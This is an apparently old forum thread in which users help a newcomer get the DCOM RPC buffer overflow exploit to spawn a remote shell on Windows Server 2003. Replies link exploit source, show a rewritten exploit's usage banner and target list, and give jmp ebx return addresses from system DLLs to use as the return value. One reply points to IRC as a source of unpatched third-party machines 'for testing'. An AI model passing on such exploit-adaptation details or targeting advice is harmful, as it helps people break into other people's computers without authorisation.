hey, just started looking into exploits and want to learn more about them and the new ones that come out rapidly. I was testing some within my home network. i started with dcom which i used the compiled cygwin dll version. (/dcom <Target ID> <Target IP>). Trying it on my 2003 machine it got in. Therefore causing the rpc service toshutdown\start, shutdown\start, and the same with the pc. I was expecting a remote shell to spawn. Did i do something wrong?

You need to find an offset for win2k3. The default dcom exploit only has universal offsets for 2k and xp.

oh i see. Yea i saw something about offsets. Is there a file to figure it out. isnt it one of the dlls in the OS.

new ones?
dont worry dude.. DCOM and RPC exploits are soo common...
the easiest way is to get yourself an IRC Client and log onto dal.net ...
its like a breeding ground for script kiddies and unpached M$ boxes...
perfect for testing..... not that im enouraging it...

ive got you acouple of links that you might be interested in:

http://www.k-otik.com/exploits/07.30.dcom48.c
an exploit (very messy)

http://www.ntisys.com/bulletins/MS-DCOM-exploits.html
this is a good link if your wanting to find the most common windows exploits (DCOM / RPC)

http://www.securiteam.com/exploits/5WP0B20B5C.html
a better exploit

http://www.securiteam.com/exploits/6Q0042K8KA.html
another exploit

my suggestions are if your looking for exploits..check out securiteam.com
its full of usefull information
its my 1st stop...

ch33rs
icenix

hmm, i can never get those things to work.

Hi Relax!!!LOL
What problem do youz have?

there is a dcom with universal offset out there

maybe take a look at this nice article:
http://www.nextgenss.com/papers/defeating-...-protection.pdf

I did that some time ago and it's quite nice and working. If somebody is interested just tell me where to upload the file

$new/win3
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Rewritten adding generic hosts - Dinos
- Usage: new/win3 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
- 7 Windows 2000 (Generic)
- 8 Windows XP (Generic)

Regards,
Dinos

i think that u dont understand he want to exploit his windows 2003 server so ur "magical" ret for 2k and xp will simply not work for 2k3...

althought if u see the metasploit exploit for dcom
( http://www.metasploit.com/releases.html )

they say that they use jmp ebx so i think in a primary view that u have to search for a jmp ebx

value for 2003 server (us) are:

-=[ ntdll.dll ]=--
jmp ebx 0x77fb5d83

--=[ kernel32.dll ]=--
jmp ebx 0x77ece3ca
jmp ebx 0x77eda8e3

-=[ msvcrt.dll ]=--

jmp ebx 0x77ba8ef8
jmp ebx 0x77ba96d5
jmp ebx 0x77bb31b1

so maybe u will need to use one of them in place of u ret and that will spawn the shell but i dont have 2k3 so i cant help u more than this